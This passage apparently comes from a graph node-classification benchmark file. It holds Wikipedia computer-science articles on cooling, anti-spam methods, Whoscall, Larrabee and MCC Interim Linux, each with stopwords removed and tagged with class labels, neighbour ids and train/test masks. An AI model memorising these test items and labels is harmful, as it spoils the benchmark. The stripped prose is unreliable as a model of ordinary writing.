overvolting undervolting used quiet systems less cooling needed reduction heat production allowing noisy fans omitted also used battery charge life must maximized conventional cooling techniques attach cooling component outside computer chip package attaching technique always exhibit thermal resistance reducing effectiveness heat efficiently quickly removed directly cooling local hot spots chip within package locations power dissipation 300 w/cm typical cpu less 100 w/cm occur although future systems expected exceed 1000 w/cm form local cooling essential developing high power density chips ideology led investigation integrating cooling elements computer chip currently two techniques micro-channel heat sinks jet impingement cooling micro-channel heat sinks channels fabricated silicon chip cpu coolant pumped channels designed large surface area results large heat transfers heat dissipation 3000 w/cm reported technique heat dissipation increased two-phase flow cooling applied unfortunately system requires large pressure drops due small channels heat flux lower dielectric coolants used electronic cooling another local chip cooling technique jet impingement cooling technique coolant flown small orifice form jet jet directed toward surface cpu chip effectively remove large heat fluxes heat dissipation 1000 w/cm reported system operated lower pressure comparison micro-channel method heat transfer increased using two-phase flow cooling integrating return flow channels hybrid micro-channel heat sinks jet impingement cooling phase-change cooling extremely effective way cool processor vapor compression phase-change cooler unit usually sits underneath pc tube leading processor inside unit compressor type air conditioner compressor compresses gas mixture gases comes evaporator cpu cooler discussed hot high pressure vapor pushed condenser heat dissipation device condenses hot gas liquid typically subcooled exit condenser liquid fed expansion device restriction system cause drop pressure vaporize fluid cause reach pressure boil desired temperature expansion device used simple capillary tube elaborate thermal expansion valve liquid evaporates changing phase absorbing heat processor draws extra energy environment accommodate change see latent heat evaporation produce temperatures reaching around liquid flow evaporator boiling cooling cpu turning vapor low pressure end evaporator gas flows compressor cycle begins way processor cooled temperatures ranging depending load wattage processor refrigeration system see refrigeration gas mixture used type system suffers number issues cost weight size vibration maintenance cost electricity noise need specialized computer tower mainly one must concerned dew point proper insulation sub-ambient surfaces must done pipes sweat dripping water sensitive electronics alternately new breed cooling system developed inserting pump thermosiphon loop adds another degree flexibility design engineer heat effectively transported away heat source either reclaimed dissipated ambient junction temperature tuned adjusting system pressure higher pressure equals higher fluid saturation temperatures allows smaller condensers smaller fans and/or effective dissipation heat high ambient temperature environment systems essence next generation fluid cooling paradigm approximately 10 times efficient single phase water since system uses dielectric heat transport medium leaks cause catastrophic failure electric system type cooling seen extreme way cool components since units relatively expensive compared average desktop also generate significant amount noise since essentially refrigerators however compressor choice air cooling system main determinant allowing flexibility noise reduction based parts chosen liquid nitrogen boils far freezing point water valuable extreme coolant short overclocking sessions typical installation liquid nitrogen cooling copper aluminum pipe mounted top processor graphics card system heavily insulated condensation liquid nitrogen poured pipe resulting temperatures well evaporation devices ranging cut heat sinks pipes attached custom milled copper containers used hold nitrogen well prevent large temperature changes however nitrogen evaporates refilled realm personal computers method cooling seldom used contexts overclocking trial-runs record-setting attempts cpu usually expire within relatively short period time due temperature stress caused changes internal temperature although liquid nitrogen non-flammable condense oxygen directly air mixtures liquid oxygen flammable materials dangerously explosive liquid nitrogen cooling generally used processor benchmarking due fact continuous usage may cause permanent damage one parts computer handled careless way even harm user liquid helium colder liquid nitrogen also used cooling liquid helium boils temperatures ranging measured heatsink however liquid helium expensive difficult store use liquid nitrogen also extremely low temperatures cause integrated circuits stop functioning silicon-based semiconductors example freeze around cooling improved several techniques may involve additional expense effort techniques often used particular run parts computer cpu gpu higher voltages frequencies specified manufacturer overclocking increases heat generation installation higher performance non-stock cooling may also considered modding many overclockers simply buy efficient often expensive fan heat sink combinations others resort exotic ways computer cooling liquid cooling peltier effect heatpumps heat pipe phase change cooling also related practices positive impact reducing system temperatures often called thermal interface material tim e.g intel perfectly flat surfaces contact give optimal cooling perfect flatness absence microscopic air gaps practically possible particularly mass-produced equipment thin skim thermal compound much thermally conductive air though much less metal improve thermal contact cooling filling air gaps small amount compound sufficient fill gaps used best temperature reduction obtained much debate merits compounds overclockers often consider compounds superior others main consideration use minimal amount thermal compound required even surfaces thermal conductivity compound typically 1/3 1/400 metal though much better air conductivity heatsink compound ranges 0.5 80w/mk see articles aluminium 200 air 0.02 heat-conductive pads also used often fitted manufacturers heatsinks less effective properly applied thermal compound simpler apply fixed heatsink omitted users unaware importance good thermal contact replaced thick ineffective layer compound unlike techniques discussed use thermal compound padding almost universal dissipating significant amounts heat mass-produced cpu heat spreaders heatsink bases never perfectly flat smooth surfaces placed best contact possible air gaps reduce heat conduction easily mitigated use thermal compound best possible results surfaces must flat possible achieved laborious process known lapping reduce cpu temperature typically older pcs use flat ribbon cables connect storage drives ide scsi large flat cables greatly impede airflow causing drag turbulence overclockers modders often replace rounded cables conductive wires bunched together tightly reduce surface area theoretically parallel strands conductors ribbon cable serve reduce crosstalk signal carrying conductors inducing signals nearby conductors empirical evidence rounding cables reducing performance may length cable short enough effect crosstalk negligible problems usually arise cable electromagnetically protected length considerable frequent occurrence older network cables computer cables cable tied chassis cables increase airflow less problem new computers use serial ata much narrower cable colder cooling medium air effective cooling cooling air temperature improved guidelines fewer fans strategically placed improve airflow internally within pc thus lower overall internal case temperature relation ambient conditions use larger fans also improves efficiency lowers amount waste heat along amount noise generated fans operation little agreement effectiveness different fan placement configurations little way systematic testing done rectangular pc atx case fan front fan rear one top found suitable configuration however amd somewhat outdated system cooling guidelines notes front cooling fan seem essential fact extreme situations testing showed fans recirculating hot air rather introducing cool air may fans side panels could similar detrimental effect—possibly disrupting normal air flow case however unconfirmed probably varies configuration desktop computers typically use one fans cooling almost desktop power supplies least one built-in fan power supplies never draw heated air within case results higher psu operating temperatures decrease psu energy efficiency reliability overall ability provide steady supply power computer internal components reason modern atx cases exceptions found ultra-low-budget cases feature power supply mount bottom dedicated psu air intake often filter beneath mounting location allowing psu draw cool air beneath case manufacturers recommend bringing cool fresh air bottom front case exhausting warm air top rear fans fitted force air case effectively removed pressure inside becomes higher outside referred positive airflow opposite case called negative airflow worth noting positive internal pressure prevents dust accumulating case air intakes equipped dust filters case negative internal pressure suffer higher rate dust accumulation even intakes filtered negative pressure draw dust available opening case air flow inside typical desktop case usually strong enough passive cpu heatsink desktop heat sinks active including one even multiple directly attached fans blowers server cooling fans 1 u enclosures usually located middle enclosure hard drives front passive cpu heat sinks rear larger higher enclosures also exhaust fans approximately 4u may active heat sinks power supplies generally rear-facing exhaust fans data centers typically contain many racks thin horizontally mounted 1u servers air drawn front rack exhausted rear data centers typically contain large numbers computers power-dissipating devices risk equipment overheating extensive hvac systems used prevent often raised floor used area floor may used large plenum cooled air power cabling another way accommodating large numbers systems small space use blade chassis oriented vertically rather horizontally facilitate convection air heated hot components tends rise creating natural air flow along boards stack effect cooling manufacturers take advantage effect laptops present difficult mechanical airflow design power dissipation cooling challenge constraints specific laptops include device whole light possible form factor built around standard keyboard layout users close noise must kept minimum case exterior temperature must kept low enough used lap cooling generally uses forced air cooling heat pipes use metal chassis case passive heat sink also common solutions reduce heat include using lower power-consumption arm intel atom processors mobile devices usually discrete cooling systems mobile cpu gpu chips designed maximum power efficiency due constraints device battery higher performance devices may include heat spreader aids transferring heat external case phone tablet",
    "neighbors": [
      518,
      1933,
      3472,
      8730,
      7963,
      10658,
      3882,
      3883,
      10288,
      1480,
      10966,
      2394,
      2525,
      10337,
      8035,
      11623,
      1515,
      9964,
      4334,
      7151,
      1776,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 4271,
    "label": 0,
    "text": "Research_on_Language_and_Computation:research language computation research language computation quarterly peer-reviewed academic journal covering research computational linguistics natural language processing established 2003 ceased publication december 2010 journal published springer science+business media journal abstracted indexed",
    "neighbors": [
      1890,
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 4272,
    "label": 4,
    "text": "Anti-spam_techniques_(users):anti-spam techniques users people tend much less bothered spam slipping filters mail box false negatives desired e-mail ham blocked false positives trying balance false negatives missed spams vs false positives rejecting good e-mail critical successful anti-spam system servers able block spam tools individual users help control balance number techniques individuals use restrict availability e-mail addresses reducing preventing attractiveness spam sharing email address among limited group correspondents one way limit spam method relies discretion members group disclosing email addresses outside group circumvents trust relationship group reason forwarding messages recipients n't know one another avoided absolutely necessary forward messages recipients n't know one another good practice list recipient names bcc instead practice avoids scenario unscrupulous recipients might compile list email addresses spamming purposes practice also reduces risk address distributed computers affected email address harvesting malware however privacy email address lost divulgence likely regained posting anonymously fake name address one way avoid e-mail address harvesting users ensure fake address valid users want receive legitimate email regarding posts web sites alter addresses humans figure spammers instance joe example.com might post joenos pam.invalid.example.com address munging however cause legitimate replies lost user valid address truly invalid otherwise someone server still get spam ways use transparent address munging avoid allowing users see actual address obfuscate automated email harvesters methods displaying part e-mail address web page image text logo shrunken normal size using in-line css jumbled text order characters restored using css spammers often regard responses messages—even responses like n't spam —as confirmation email address valid likewise many spam messages contain web links addresses user directed follow removed spammer mailing list several cases spam-fighters tested links confirming lead recipient address removal—if anything lead spam removal request filing complaint may get address list washed lower complaints spammer stay active acquire new accounts and/or internet provider sender addresses often forged spam messages including using recipient address forged sender address responding spam may result failed deliveries may reach innocent e-mail users whose addresses abused usenet widely considered even important avoid responding spam many isps software seek destroy duplicate messages someone may see spam respond cancelled server effect reposting spam since duplicate reposted copy last longer replying may also cause poster falsely linked part spam message contact forms allow users send email filling forms web browser web server takes form data forwarding email address users never see email address forms however sometimes inconvenient users able use preferred e-mail client risk entering faulty reply address typically notified delivery problems contact forms drawback require website supports server side scripts finally software used run contact forms badly designed become spam tool right additionally spammers begun send spam using contact form many modern mail programs incorporate web browser functionality display html urls images easily expose user offensive images spam addition spam written html contain web bugs allows spammers see e-mail address valid message caught spam filters javascript programs used direct user web browser advertised page make spam message difficult close delete spam messages contained attacks upon security vulnerabilities html renderer using holes install spyware computer viruses borne mechanisms mail clients automatically download display html images attachments fewer risks clients configured display default email user may sometimes need give address site without complete assurance site owner use sending spam one way mitigate risk provide disposable email address—a temporary address user disable abandon forwards email real account number services provide disposable address forwarding addresses manually disabled expire given time interval expire certain number messages forwarded disposable email addresses used users track whether site owner disclosed address capability resulted legal jeopardy sites disclose confidential addresses without permission systems use ham passwords ask unrecognised senders include email password demonstrates email message ham spam message typically email address ham password would described web page ham password would included subject line email address ham passwords often combined filtering systems counter risk filtering system accidentally identify ham message spam message plus addressing technique appends password username part email address tracking spammer isp reporting offense lead spammer service terminated criminal prosecution unfortunately difficult track spammer—and online tools assist always accurate occasionally spammers employ netblocks case abuse contact netblock spammer confirm address examples online tools spamcop network abuse clearinghouse provide automated semi-automated means report spam isps spam-fighters regard inaccurate compared expert email system however email users experts free tool called complainterator may used reporting spam complainterator send automatically generated complaint registrar spamming domain registrar name servers historically reporting spam way seriously abated spam since spammers simply move operation another url isp network ip addresses consumers may also forward unwanted deceptive commercial email email address spam uce.gov maintained us federal trade commission ftc database collected used prosecute perpetrators scam deceptive advertising alternative contacting isps contact registrar domain name used spam e-mail registrars icann-accredited administrative organizations obliged uphold certain rules regulations resources necessary dealing abuse complaints advocate responding aggressively spam—in words spamming spammer basic idea make spamming less attractive spammer increasing spammer overhead several ways reach spammer besides caveats mentioned may lead retaliations spammer variety techniques e-mail senders use try make sure send spam failure control amount spam sent judged e-mail receivers often cause even legitimate email blocked sender put dnsbls since spammer accounts frequently disabled due violations abuse policies constantly trying create new accounts due damage done isp reputation source spam many isps web email providers use captchas new accounts verify real human registering account automated spamming system also verify credit cards stolen accepting new customers check spamhaus project rokso list background checks one difficulty implementing opt-in mailing lists many means gathering user email addresses remain susceptible forgery instance company puts web form allow users subscribe mailing list products malicious person enter people email addresses — harass make company appear spamming anti-spammers company sends e-mail forgery victims spamming albeit inadvertently prevent abuse maps anti-spam organizations encourage mailing lists use confirmed opt-in also known verified opt-in double opt-in whenever email address presented subscription list list software send confirmation message address confirmation message contains advertising content construed spam — address added live mail list unless recipient responds confirmation message see also spamhaus mailing lists vs. spam lists page modern mailing list management programs gnu mailman listserv majordomo qmail ezmlm support confirmed opt-in default e-mail senders type anti-spam checks e-mail coming users customers done e-mail coming rest internet sort bounce message anti-virus warning gets sent forged email address result backscatter problems sending challenges forged e-mail addresses greatly reduced creating new message contains challenge instead challenge placed bounce message receiving mail system gives rejection-code smtp session receiving mail system rejects e-mail way sending system actually creates bounce message result bounce message almost always sent real sender format language sender usually recognize firewalls routers programmed allow smtp traffic tcp port 25 machines network supposed run mail transfer agents send e-mail practice somewhat controversial isps block home users especially isps allow blocking turned upon request e-mail still sent computers designated smart hosts via port 25 smart hosts via e-mail submission port 587 network address translation used intercept port 25 smtp traffic direct mail server enforces rate limiting egress spam filtering commonly done hotels cause e-mail privacy problems well making impossible use starttls smtp-auth port 587 submission port n't used machines suddenly start sending lots e-mail may well become zombie computers limiting rate e-mail sent around typical computer question legitimate e-mail still sent large spam runs slowed manual investigation done monitoring spam reports places spamcop aol feedback loop network abuse clearinghouse domain abuse mailbox etc. isps often learn problems seriously damage isp reputation mail servers blacklisted malicious software human spam senders often use forged addresses sending spam messages control may enforced smtp servers ensure senders use correct email address field outgoing messages email users database user record e-mail address smtp server must check email address field outgoing message address belongs user credentials supplied smtp authentication field forged smtp error returned email client e.g email address trying send isps webmail providers either acceptable use policy aup terms service tos agreement discourages spammers using system allows spammer terminated quickly violations increasingly anti-spam efforts led co-ordination law enforcement researchers major consumer financial service companies internet service providers monitoring tracking e-mail spam identity theft phishing activities gathering evidence criminal cases appropriate legislation enforcement significant impact spamming activity penalty provisions australian spam act 2003 dropped australia ranking list spam-relaying countries email spam tenth twenty-eighth legislation provides mandates bulk emailers must follow makes compliant spam easier identify filter analysis sites spamvertised given piece spam often leads questionable registrations internet domain names since registrars required maintain trustworthy whois databases digging registration details complaining proper locations often results site shutdowns uncoordinated activity may effective given today volume spam rate criminal organizations register new domains however coordinated effort implemented adequate infrastructure obtain good results since spamming facilitated fact large volumes email inexpensive send one proposed set solutions would require senders pay cost order send email making prohibitively expensive spammers anti-spam activist daniel balsam attempts make spamming less profitable bringing lawsuits spammers number proposals sideband protocols assist smtp operation anti-spam research group asrg internet research task force irtf working number email authentication proposals providing simple source authentication flexible lightweight scalable recent internet engineering task force ietf activities include marid 2004 leading two approved ietf experiments 2005 domainkeys identified mail 2006 dmarc stands domain-based message authentication reporting conformance standardizes email receivers perform email authentication using well-known sender policy framework spf dkim mechanisms channel email new proposal sending email attempts distribute anti-spam activities forcing verification probably using bounce messages back-scatter n't occur first email sent new contacts smtp proxies allow combating spam real time combining sender behavior controls providing legitimate users immediate feedback eliminating need quarantine statistical bayesian filtering set requires administrative maintenance per se instead users mark messages spam nonspam filtering software learns judgements thus statistical filter reflect software author administrator biases content rather user biases example biochemist researching viagra wo n't messages containing word viagra automatically flagged spam viagra show often legitimate messages still spam emails containing word viagra get filtered content rest spam messages differs significantly content legitimate messages statistical filter also respond quickly changes spam content without administrative intervention long users consistently designate false negative messages spam received email statistical filters also look message headers thereby considering content also peculiarities transport mechanism email typical statistical filtering uses single words calculations decide message classified spam powerful calculation made using groups two words taken together random noise words used successfully fool filter software programs implement statistical filtering include bogofilter dspam spambayes assp e-mail programs mozilla mozilla thunderbird mailwasher later revisions spamassassin another interesting project crm114 hashes phrases bayesian classification phrases also free mail filter popfile sorts mail many categories user wants family friends co-worker spam whatever bayesian filtering spam subject several research conferences including",
    "neighbors": [
      1667,
      3462,
      519,
      9222,
      8202,
      8204,
      3350,
      10263,
      10392,
      1305,
      11418,
      8224,
      8747,
      10541,
      9909,
      4793,
      7739,
      9532,
      4414,
      8130,
      4547,
      3908,
      4294,
      10696,
      3145,
      10826,
      10578,
      7764,
      3032,
      7515,
      9053,
      4325,
      6246,
      488,
      6762,
      1771,
      1653,
      6261
    ],
    "mask": "Test"
  },
  {
    "node_id": 4273,
    "label": 4,
    "text": "Whoscall:whoscall whoscall caller id number management mobile application developed gogolook division korean company naver corporation app identifies incoming call call comes allowing users identify important calls filter unwanted callers also includes number management features number keyword blocks offline database whoscall relies networks local partners internet searches user community generated content identify numbers platform available across android windows phone ios platforms name whoscall derives calling available 31 countries including taiwan korea hong kong japan thailand brazil conception app arose weekly gathering three founders later became gogolook moment took time day jobs work various app ideas weekends free time gathering one founders received telephone call promptly asked others quick search incoming unknown number online hoping search result either forum business page prepare call choose ignore got wondering app feasible first version app launched august 2010 still one several apps part-timers moment got slow start eventually gained traction propelled limelight google ’ ceo eric schmidt visit taiwan mentioned app whoscall name “ app called whoscall tells strange numbers ’ fast growing ... taiwan. ” 2013 whoscall selected google play ’ best apps 2013 8 countries across asia time received initial funding trinity investment corporation angel investors end year whoscall buyout korea internet service company nhn株式會社 nt 529 million dollars whoscall ios version launched december 2014 2015 whoscall official website completely updated provide search services number searching time whoscall officially launched beta test whoscall card also released whoscall featured whoscall dialer shortcuts end 2015 whoscall announced upgrade three major functions whoscall card mobile directory whoscall featured soon became user personal call manager 2016 whoscall fully upgraded whoscall card ios version introduces instant caller identification new blocking features end 2016 whoscall global downloads exceeded 50 million identifying billions times month july 18 2017 whoscall signed mou korean financial management association company launched online shopping reporting system fraud october whoscall released playbook advanced searching feature providing caller identification also store information far whoscall 60 million users around world specializing ai r whoscall showcard released beta v4.3 allows users customize outgoing call screens users edit personal business names along descriptions business address business hours photos shown shown showcard info shown outgoing calls rings screen receiving end call ends receiver call end dialogue may also choose view information regarding number whoscall featured several prominent international media including techcrunch techinasia e27 highly regarded overwhelming positive reviews holds average 4.4 star ratings google play store 2013 google play taiwan awarded whoscall 2013 innovation awards year whoscall awarded google play ’ best apps year taiwan hong kong singapore philippines malaysia indonesia vietnam thailand 2015 whoscall 2015 app store featured next year whoscall became 2016 google play featured awarded popular app google store 2017 whoscall chosen google successful case study event google i/o 2017 november 2011 google ’ ceo eric schmidt visit taiwan mentioned app whoscall name “ app called whoscall tells strange numbers ’ fast growing ... taiwan. ” may 20 2014 president taiwan ying-jeou address nation marking 6th year office mentions gogolook name refers example creativity potential youth taiwan april 2014 growing concerns regarding whoscall privacy issues prompting public figures take press cases public records including home telephone numbers addresses showing incoming calling screens gogolook swiftly came statement never collected stored personal information servers let alone make publicly available soon discovered personal information said public figures leaked government servers poor security made available search engines gogolook sources information whoscall promptly lauded call screen telemarketers also reliable reminder possible dissemination personal information",
    "neighbors": [
      8351,
      11170,
      8413,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 4274,
    "label": 7,
    "text": "Heartbeat_network:heartbeat network computer clusters heartbeat network private network shared nodes cluster accessible outside cluster used cluster nodes order monitor node status communicate messages necessary maintaining operation cluster heartbeat method uses fifo nature signals sent across network making sure messages received system ensures events properly ordered communications protocol every node sends back message given interval say delta effect confirming alive heartbeat messages viewed control messages help determine network includes delayed messages receiver node called sync maintains ordered list received messages message timestamp later given marked time received every node system determines messages received since fifo property ensures messages ordered general difficult select delta optimal applications delta small requires much overhead large results performance degradation everything waits next heartbeat signal",
    "neighbors": [
      2913,
      3927,
      4026,
      9243,
      5566
    ],
    "mask": "None"
  },
  {
    "node_id": 4275,
    "label": 4,
    "text": "BLADE_(software):blade software blade block drive-by download exploits computer program developed phillip porras vinod yegneswaran sri international long lu wenke lee georgia institute technology blade funded grants national science foundation united states army research laboratory office naval research program designed prevent drive-by download malware attacks",
    "neighbors": [
      3786,
      3555,
      5612,
      5373
    ],
    "mask": "Train"
  },
  {
    "node_id": 4276,
    "label": 3,
    "text": "Larrabee_(microarchitecture):larrabee microarchitecture larrabee codename cancelled gpgpu chip intel developing separately current line integrated graphics accelerators named larrabee state park whatcom county washington near town bellingham chip released 2010 core consumer 3d graphics card plans cancelled due delays disappointing early performance figures project produce gpu retail product directly larrabee research project terminated may 2010 intel mic multiprocessor architecture announced 2010 inherited many design elements larrabee project function graphics processing unit product intended co-processor high performance computing almost decade later june 12 2018 idea intel dedicated gpu revived intel desire create discrete gpu set launch 2020 whether new development connected developments larabee remain uncertain however december 4 2009 intel officially announced first-generation larrabee would released consumer gpu product instead released development platform graphics high-performance computing official reason strategic reset attributed delays hardware software development may 25 2010 technology intel blog announced larrabee would released gpu instead would released product high-performance computing competing nvidia tesla project produce gpu retail product directly larrabee research project terminated may 2010 intel mic multiprocessor architecture announced 2010 inherited many design elements larrabee project function graphics processing unit product intended co-processor high performance computing prototype card named knights ferry production card built 22 nm process named knights corner planned production 2012 later larrabee considered hybrid multi-core cpu gpu similarities coherent cache hierarchy x86 architecture compatibility cpu-like wide simd vector units texture sampling hardware gpu-like gpu larrabee would supported traditional rasterized 3d graphics direct3d opengl games however hybridization cpu gpu features also suitable general purpose gpu gpgpu stream processing tasks example might performed ray tracing physics processing real time games offline scientific research component supercomputer larrabee early presentation drew criticism gpu competitors nvision 08 nvidia employee called intel siggraph paper larrabee marketing puff quoted industry analyst peter glaskowsky speculated larrabee architecture like gpu 2006 june 2009 intel claimed prototypes larrabee par nvidia geforce gtx 285 justin rattner intel cto delivered keynote supercomputing 2009 conference november 17 2009 talk demonstrated overclocked larrabee processor topping one teraflops performance claimed first public demonstration single-chip system exceeding one teraflops pointed early silicon thereby leaving open question eventual performance architecture one fifth available competing graphics boards larrabee cancelled standalone discrete graphics product december 4 2009 larrabee intended differ older discrete gpus geforce 200 series radeon 4000 series three major ways expected make larrabee flexible current gpus allowing differentiation appearance games 3d applications intel siggraph 2008 paper mentioned several rendering features difficult achieve current gpus render target read order-independent transparency irregular shadow mapping real-time raytracing recent gpus ati radeon hd 5xxx nvidia geforce 400 series feature increasingly broad general-purpose computing capabilities via directx11 directcompute opencl well nvidia proprietary cuda technology giving many capabilities larrabee x86 processor cores larrabee differed several ways cores current intel cpus core 2 duo core i7 theoretically larrabee x86 processor cores would able run existing pc software even operating systems different version processor might sit motherboard cpu sockets using quickpath intel never announced plans though larrabee native c/c++ compiler included auto-vectorization many applications able execute correctly recompiled maximum efficiency expected required code optimization using c++ vector intrinsics inline larrabee assembly code however gpgpus software would benefited utilization vector processing unit one tech journalism site claims larrabee graphics capabilities planned integrated cpus based haswell microarchitecture larrabee philosophy using many small simple cores similar ideas behind cell processor commonalities use high-bandwidth ring bus communicate cores however many significant differences implementation expected make programming larrabee simpler intel began integrating line gpus onto motherboards intel gma brand 2004 integrated onto motherboards newer versions released sandy bridge incorporated onto die cpu chips sold separately though low cost power consumption intel gma chips made suitable small laptops less demanding tasks lack 3d graphics processing power compete contemporary nvidia amd/ati gpus share high-end gaming computer market hpc market place popular video game consoles contrast larrabee sold discrete gpu separate motherboards expected perform well enough consideration next generation video game consoles team working larrabee separate intel gma team hardware designed newly formed team intel hillsboro oregon site separate designed nehalem software drivers written newly formed team 3d stack specifically written developers rad game tools including michael abrash intel visual computing institute research basic applied technologies could applied larrabee-based products intel siggraph 2008 paper describes cycle-accurate simulations limitations memory caches texture units included larrabee projected performance graphs show many 1 ghz larrabee cores required maintain 60 frame/s 1600×1200 resolution several popular games roughly 25 cores required gears war antialiasing 25 cores f.e.a.r 4× antialiasing 10 cores 4× antialiasing intel claimed larrabee would likely run faster 1 ghz numbers represent actual cores rather virtual timeslices another graph shows performance games scales nearly linearly number cores 32 cores 48 cores performance drops 90 would expected linear relationship continued june 2007 pc watch article suggested first larrabee chips would feature 32 x86 processor cores come late 2009 fabricated 45 nanometer process chips defective cores due yield issues would sold 24-core version later 2010 larrabee would shrunk 32 nanometer fabrication process enable 48-core version last statement performance calculated theoretically maximum possible performance follows 32 cores × 16 single-precision float simd/core × 2 flop fused multiply-add × 2 ghz 2 tflops theoretically public demonstration larrabee architecture took place intel developer forum san francisco september 22 2009 early port former cpu-based research project shown real-time scene contained ray traced water surface reflected surrounding objects like ship several flying vehicles accurately second demo given sc09 conference portland november 17 2009 keynote intel cto justin rattner larrabee card able achieve 1006 gflops sgemm 4kx4k calculation engineering sample larrabee card procured reviewed linus sebastian video published may 14 2018 unable make card give video output however motherboard displaying post code d6",
    "neighbors": [
      3586,
      3459,
      5380,
      2821,
      3973,
      9095,
      5386,
      9611,
      4108,
      6926,
      5649,
      5523,
      6804,
      8851,
      4886,
      407,
      3352,
      9111,
      5883,
      6815,
      10658,
      9126,
      6311,
      3882,
      10669,
      9391,
      10548,
      1461,
      9911,
      2237,
      5309,
      8126,
      8514,
      6339,
      5444,
      1480,
      1998,
      2638,
      5073,
      1119,
      3175,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      499,
      8820,
      3317,
      4217,
      1915,
      508,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 4277,
    "label": 9,
    "text": "Interactive_Ruby_Shell:interactive ruby shell interactive ruby shell irb irb repl programming object-oriented scripting language ruby abbreviation irb comes fact filename extension ruby .rb although interactive ruby files extension .irb program launched command line allows execution ruby commands immediate response experimenting real-time features command history line editing capabilities job control able communicate directly shell script internet interact live server developed keiju ishitsuka syntax example",
    "neighbors": [
      2181,
      7430,
      9229,
      4750,
      2191,
      7695,
      10387,
      10771,
      7325,
      9245,
      7983,
      564,
      9780,
      5945,
      1852,
      5567,
      6338,
      8262,
      11208,
      5578,
      10973,
      2786,
      1379,
      9320,
      11625,
      5612,
      2804
    ],
    "mask": "Test"
  },
  {
    "node_id": 4278,
    "label": 3,
    "text": "Alien_8:alien 8 alien 8 action-adventure video game developed published ultimate play game released zx spectrum bbc micro amstrad cpc msx 1985 game spiritual successor best-selling knight lore lauded critics isometric graphics game player takes control robot alien 8 whose job ensure cryogenically frozen passengers board starship remain viable ship voyage game written chris stamper graphics designed tim stamper alien 8 uses image masking technique knight lore allows developers create composite structures stacked images without visual overlay technique copyrighted ultimate filmation game engine spiritual predecessor game rendered isometric projection game critically acclaimed upon release reviewers praised game graphics innovation however minor criticism directed similarities knight lore game presented isometric format set board starship taking role robot alien 8 player must explore large starship order ensure cryogenic life support systems preserving biological crew re-activated core system series geometrically-shaped circuits however circuits removed invading aliens distributed around starship main objective game collect correct circuits return respective locations starship reaches destination circuits variously shaped cubes pyramids domes cylinders spiritual predecessor environment game takes form series isometric flip-screen rooms trace outline large starship total 129 rooms filled various objects moveable platforms static hazards spikes hostile aliens well executing well-timed manoeuvres jumps player able use starship props block defend another feature use remote controlled drones directed alien 8 inaccessible dangerous areas dying planet distant galaxy last creatures known guardians stored libraries records knowledge single starship together cryogenically preserved members race single robot alien 8 tasked keeping occupants vessel alive duration journey ship launched towards new solar system alien 8 performs task thousands years journey however ship nears destination attacked boarded hostile aliens cryogenic life support systems damaged attack alien 8 must restore operational status ship automatic thrusting systems manoeuvre planetary orbit development alien 8 began immediately release knight lore stamper brothers predicted publishers would attempt copy knight lore filmation technology games predecessor stamper brothers developed game monochrome avoid visual overlay attribute clash common processing limitation early 8-bit consoles however amstrad release exclusively displayed dual-colours game critically acclaimed upon release reviewer crash praised graphics presentation stating excellent imaginative pleasing compared predecessor despite regarding slight difference amstrad action similarly praised graphics citing amazing brilliant great colour combinations reviewer amtix stated visuals breathtakingly stunning improves predecessor david kelly popular computing weekly stated game little disappointment due similarities knight lore however asserted graphics superior quality predecessor chris bourne sinclair user stated general quality graphics higher predecessor although used identical system crash praised new additions game particular time limit various collectable items reviewer stated new features compelling exciting differs predecessor reviewer amstrad action similarly praised innovation stating wonderfully original ideas despite criticising similarities knight lore kelly praised game extra puzzles animation enemies heralding brilliant bourne similarly praised 3d animation stating every extension game improved knight lore",
    "neighbors": [
      320,
      4102,
      9191,
      2792,
      9254,
      9006,
      10931,
      5820,
      2173
    ],
    "mask": "Test"
  },
  {
    "node_id": 4279,
    "label": 2,
    "text": "MCC_Interim_Linux:mcc interim linux mcc interim linux linux distribution first released february 1992 owen le blanc manchester computing centre mcc part university manchester first linux distribution created computer users unix experts featured menu-driven installer installed kernel set end-user programming tools mcc first made linux available anonymous ftp november 1991 le blanc irritations early experiments linux lack working fdisk would later write one need use multiple ftp repositories acquire essential software library version problems inspired creation distribution le blanc claimed referred distributions interim ... intended final official small harmonious moderately tested conform everyone taste -- release -- provide stable base software added prior first release closest approximation linux distribution h j lu boot-root floppy disk images two 5¼ diskette images containing linux kernel minimum tools required get started minimal tools able boot hard drive required editing master boot record hex editor first release mcc interim linux based linux 0.12 made use theodore ts ramdisk code copy small root image memory freeing floppy drive additional utilities diskettes also stated distributions unofficial experiments describing goals releases indeed attempt ever made distribute wide range software even x386 windowing system soon first release came distributions tamu created individuals texas university martin junius mj softlanding linux system h j lu small base system turn quickly superseded debian slackware oldest surviving distributions 1.0 distribution mcc interim pointed debian five times size mcc quite comprehensive final distribution encouraged users switch debian providing transitional support discussed email dated 23 april 1992 boot utilities disk pair included optional pair disks contained gcc g++ 2.1 kermit shoelace released 14 april 1993 added version 0.95c+ bison flex gdb gprof groff gzip man released 26 april 1993 added version 0.99.p8 emacs info added version 0.99.p8+ elm lp mail progman timezone words",
    "neighbors": [
      8837,
      9735,
      7435,
      10127,
      912,
      2321,
      5397,
      3222,
      4887,
      6808,
      10394,
      10016,
      673,
      3745,
      10530,
      11297,
      9253,
      10149,
      11305,
      4398,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      9542,
      2375,
      4039,
      5067,
      8907,
      4309,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      2545,
      8177,
      5363,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 4280,
    "label": 5,
